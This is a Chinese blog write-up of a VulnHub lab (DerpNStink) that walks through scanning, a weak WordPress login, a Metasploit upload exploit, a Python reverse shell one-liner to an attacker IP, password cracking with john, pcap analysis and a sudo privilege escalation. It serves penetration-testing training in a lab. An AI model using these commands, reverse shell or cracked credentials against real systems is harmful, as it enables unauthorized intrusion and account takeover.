vulnhub渗透日记06:DerpNStink

已于 2023-07-21 19:56:14 修改
阅读量150 收藏
点赞数
分类专栏: Vulnhub靶机渗透日记 文章标签: web安全 linux
于 2023-07-17 19:16:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ericalezl/article/details/131773055
版权

前言

⏰时间:2023.7.17
🗺️靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝

信息收集

主机发现
nmap -sn
在这里插入图片描述端口扫描
masscan --rate=100000 -p 1-65535 192.168.58.151
在这里插入图片描述针对开放端口进一步探测
nmap -A -p 22,21,80 192.168.58.151
在这里插入图片描述80端口网站源码处发现flag1,或者f12可以找到
在这里插入图片描述
在这里插入图片描述同时找到这个,访问这个txt

在这里插入图片描述得到提示,需要在hosts文件中写入域名 ,一开始以为是derpnstink.com ,结果后面访问显示derpnstink.local
在这里插入图片描述扫目录发现存在/weblog/,admin:admin登录
在这里插入图片描述wpscan扫描发现版本是4.6.26
在这里插入图片描述 存在利用点
在这里插入图片描述

反弹shell

msf搜索
在这里插入图片描述use 3
exploit/unix/webapp/wp_slideshowgallery_upload
options看下需要配啥
一顿set之后run,进来了
在这里插入图片描述进入shell执行python反弹shell,不反弹也可以
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.58.128",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty;pty.spawn(“/bin/bash”)'进入交互式shell,比较稳定
找到/weblog/wp-config.php,拿到数据库账号密码
在这里插入图片描述

phpmyadmin

扫目录还发现了phpmyadmin,直接登录
在这里插入图片描述
还有另一个用户 unclestinky
在这里插入图片描述

john解密

用john破解密码

echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > code.hash
john code.hash --wordlist=/usr/share/wordlists/rockyou.txt
john code.hash --show #显示解出的密码

在这里插入图片描述unclestinky:wedgie57
登录这个用户 看到flag2
在这里插入图片描述看下用户
在这里插入图片描述看能不能用刚才的密码登录过去
su stinky
在这里插入图片描述进来先看看home,desktop里找到flag3
在这里插入图片描述在ftp文件夹中发现套娃ssh,明显是公钥免密登录,这个应该是另一条通往登录stinky用户的路
在这里插入图片描述但是提示不支持公钥免密
在这里插入图片描述

wireshark流量分析

所以只能通过su 登录
之后Documents的文件夹内发现derpissues.pcap,是个流量包文件,用wireshark分析下
kali执行 nc -lp 4444 > derpissues.pcap
目标执行 nc 192.168.58.128 4444 < derpissues.pcap
这样就把文件传输到kali

wireshark file.pcap 分析文件
tcp.stream eq 48 追踪tcp流
frame contains mrderp  /login 查看登录信息
http.request.method == "POST" 查看post请求的包

在这里插入图片描述derpderpderpderpderpderpderp
su mrderp
进来后再看下home目录,没啥东西

sudo提权

sudo提权看下

mkdir binaries;cd binaries
echo '/bin/bash' > derpy.sh
chmod +x derpy.sh
sudo ./derpy.sh

需要在/home/mrderp/下新建binaries文件夹,并在binaries文件夹创建derpy.sh,文件名必须是这个
在这里插入图片描述

_WHOAM1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Vulnhub靶机-DeRPnStiNK
ergeLXT的博客
06-28 1008
服务器上有wordpress,打开/weblog/目录,被重定向到 http://derpnstink.local/weblog。使用wpscan来枚举网站 http://derpnstink.local/weblog 的插件、主题和用户。查看发现不可以任意上传下载文件,只能在指定目录下上传下载文件,不可以使用udf。还有一个21端口,尝试登陆一下,使用stinky/wedgie57登陆成功。在ftp中找到ssh登陆的key,使用stinky用户登录成功。发现ssh不支持密码登陆,只可以通过指纹登陆。
【未完成】【甄选靶场】Vulnhub百个项目渗透——项目四十一:DEFCON Toronto-Galahad(图像深层分析,流量分析
人间体佐菲的博客
10-16 571
【未完成】【甄选靶场】Vulnhub百个项目渗透——项目四十一:DEFCON Toronto-Galahad(图像深层分析,流量分析
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
记一次vulnhub|渗透测试Five86-2
crispr的博客
01-29 1393
Five86-2 0X01 Main Point 1.wpscan的使用 2.tcpdump的抓包以及流量分析 3.wordpress插件提权 0X02 前期嗅探和端口探测 arp-scan -l得到靶机IP: nmap -sS -A -p- 172.20.10.3扫描靶机IP的端口开放情况: ftp无法匿名登录,只能从80端口入手: wordpress框架;显示不清楚; 在/et...
VulnHub-DerpNStink:1渗透学习
我是小小白的博客
07-13 954
前言 靶机地址:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova 靶机难度:中级(CTF) 靶机发布日期:2018 年 2 月 9日 靶机描述:Derp 先生和 Stinky 叔叔是两位正在创办自己的公司 DerpNStink 的系统管理员。他们没有聘请合格的专业人士来建立他们的 IT 环境,而是决定将他们自己的系统组装在一起,该系统几乎准备好上线...... 目标:得到root权限&找到4个flag文件
Vulnhub:Derpnstink靶机渗透
m0_62008601的博客
12-26 1218
渗透学习
vulnhub渗透日记14:Pinky‘s Palace: V2
ericalezl的博客
07-28 1853
⏰时间:2023.7.25🗺️靶机地址:https://download.vulnhub.com/pinkyspalace/Pinkys-Palace2.zip⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
Vulnhub-DERPNSTINK: 1-靶机渗透学习
嗯嗯呐的博客
11-19 2008
靶机地址:https://www.vulnhub.com/entry/derpnstink-1,221/ 靶机难度:中等(CTF) 靶机描述:这是基于Ubuntu的boot2root虚拟机。它已使用DHCP设置的网络接口在VMware Fusion和VMware Workstation12上进行了测试。它旨在模拟我在OSCP实验室中遇到的一些较早的机器,同时还带有一些较小的曲线球,但是没有什么花哨的。坚持经典的黑客方法,并列举所有内容! 目标:找到所有4个标志,最终将您带到完全root访问权限 作者:嗯嗯呐
Vulnhub:DeRPnStiNK渗透测试
mandarava的博客
03-08 1017
老规矩,用nmap扫一下。发现端口80、22、21、514。输入命令nmap -T4 -a -v xxx.xxx.xxx.xxx。 Nmap scan report for xxx.xxx.xxx.xxx Host is up (1.2s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open f...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
在XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
渗透项目(七):DERPNSTINK: 1
Ays.Ie的博客
11-12 1509
本篇文章记录了作者第7个渗透项目,具体记录了渗透过程以及方法。
vulnhub:DeRPnStiNK
墨染的博客
10-09 1719
环境搭建 下载虚拟机包文件VMware或VirtualBox打开,配置网络模式为NAT模式。 下载链接:https://download.vulnhub.com/derpnstink/VulnHub2018_DeRPnStiNK.ova hash:949e2f8a7d63fabdc55c675c95efe022 开搞 flag1 首先nmap -sP 192.168.14.1/24一波找一下...
vulnhub靶场——GOLDENEYE: 1 渗透记录
ShenZ的博客
02-10 2268
vulnhub—GOLDENEYE: 1 vulnhub靶场——GOLDENEYE: 1 渗透记录 About Description 一、信息搜集 二、网站渗透 三、Moodle漏洞利用
vulnhub靶机-CyberSploit:1渗透笔记
liver100day的博客
07-30 644
文章目录1.环境搭建2.信息收集2.1 主机发现2.2 端口扫描2.3 访问80端口(http服务)2.4 爆破目录3.漏洞利用3.1 ssh登录4.提权1.在kali里面搜索有无该版本的漏洞利用文件2.将文件保存到本地(若不指定文件保存目录的话,文件保存的位置为你当前路径)3.使用python搭建一个简易的服务器4.控制ssh下载漏洞利用文件5.编译漏洞利用文件并执行提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:CyberSploit:1
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-03 829
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、中间件、数据库。其中电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
【网络安全】服务基础第一阶段——第九节:Windows系统管理基础---- Windows_AD域
goldfish8848的博客
09-03 765
活动目录(Active Directory,AD)是微软Windows Server操作系统中的一个关键服务,它提供了一个集中的目录服务,用于管理网络环境中的用户、计算机、设备、应用程序和服务。,如⼀个⽤户,如果我们在服务器已给这个⽤户定义了讲如:⽤户名、⽤户密码、⼯作单位、联系电话、家庭住址等,那上⾯所说的总和⼴义上理解就是“⽤户”这个名字的名字空间,因为我们只输⼊⼀个⽤户名即可找到上⾯我所列的⼀切信息。例如,在AD中,域控制器的名称会映射到其在DNS中的记录,以便⽹络中的其他服务和客户端可以找到它。
网络安全服务基础Windows--第15节-CA与HTTPS理论
最新发布
m0_65771743的博客
09-03 780
SSL 3.0(1996年发布):这是⼀个⼤幅改进的版本,修复了 SSL 2.0 中的许多漏洞,并引⼊了更强⼤的加密和消息认证机制。SSL 是由 Netscape 公司于 1990 年代早期开发的,⽬的是为互联⽹通信提供加密和身份验证,特别是在电⼦商务和在线⽀付等需要保护敏感信息的场景中。SSL 2.0(1995年发布):这是第⼀个公开发布的版本,但很快被发现存在多种安全漏洞,例如,SSL 2.0 不⽀持⾜够强⼤的加密算法,也缺乏对消息完整性的保护。CA 验证实体的身份,并为其颁发绑定特定公钥的数字证书。
vulnhub靶机——raven: 2
09-03
你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3 #### 引用[.reference_title] - *1* [vulnhub靶机raven2]...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值